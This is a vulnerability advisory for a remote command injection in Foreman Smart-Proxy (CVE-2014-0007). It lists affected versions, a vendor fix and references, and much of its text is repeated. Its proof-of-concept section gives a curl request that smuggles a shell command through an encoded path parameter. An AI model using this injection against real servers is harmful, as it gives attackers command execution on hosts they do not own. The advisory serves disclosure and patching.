Foreman Smart-Proxy Remote Command Injection Vulnerability
BID:68117
Info
Foreman Smart-Proxy Remote Command Injection Vulnerability
| Bugtraq ID: | 68117 |
| Class: | Design Error |
| CVE: |
CVE-2014-0007 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 05 2014 12:00AM |
| Updated: | Jun 05 2014 12:00AM |
| Credit: | Lukas Zapletal |
| Vulnerable: |
Redhat OpenStack 4.0 Redhat OpenStack 3.0 Foreman Foreman 1.4.5 |
| Not Vulnerable: | |
Discussion
Foreman Smart-Proxy Remote Command Injection Vulnerability
Foreman is prone to a remote command-injection vulnerability.
Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy.
Foreman is prone to a remote command-injection vulnerability.
Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy.
Exploit / POC
Foreman Smart-Proxy Remote Command Injection Vulnerability
The following exploit URL is available:
curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'
The following exploit URL is available:
curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'
Solution / Fix
Foreman Smart-Proxy Remote Command Injection Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
Foreman Smart-Proxy Remote Command Injection Vulnerability
References:
References:
- Foreman Homepage (Foreman)
- CVE-2014-0007 - TFTP boot file fetch API permits remote code execution (Foreman)
- CVE-2014-0007 foreman-proxy: smart-proxy remote command injection (Red Hat Bugzilla)
- Security Advisory Critical: foreman-proxy security update (Red Hat)